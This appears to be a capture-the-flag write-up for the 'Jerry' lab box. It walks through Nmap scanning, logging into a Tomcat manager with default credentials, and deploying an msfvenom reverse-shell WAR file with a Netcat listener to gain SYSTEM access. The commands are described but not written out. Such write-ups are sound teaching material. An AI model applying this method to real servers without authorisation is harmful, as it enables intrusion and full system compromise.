Jerry Writeup
Without Metasploit
Reconnaissance
Initial Nmap Scan to find open ports, using treat all hosts as online (-Pn)
Detailed Nmap Scan :
Command Breakdown:
(-sV): Service version
(-sC): Default nmap scripts
(-p): Specifying ports 8080
(-oN nmap): Saving it into a files called nmap
Lets go visit the web server this machine is hosting on port 8080.
Looking at the site and testing around tells us that Apache Tomcat/7.0.88 is running on it and we need a set of credentials to login as manger to perform other actions.
What we can do now is to go to google and search for default credentials that might work and let us login into the server. Also we can see a username and a password on the error page we get when we try to access the manager app with wrong credentials
Lets try logging in with these credentials
And we are logged in! Now looking at the application we can see that we have an option to upload and execute WAR files, this is something that we can generate using msfvenom and try getting a reverse shell on the server.
Exploitation
First we have to generate the msfvenom war file calling it reverse.war. I'm using my machines IP for LHOST (Listening Host), make sure to add your IP to the command.
Now lets upload the file
After clicking deploy we can see that it has been added as a path under the Applications tab
After clicking the link (/reverse) we will get a reverse shell, so we first have to start a Netcat listener on our machine.
Once we click the link, we get the reverse shell and as nt authority\system
Last updated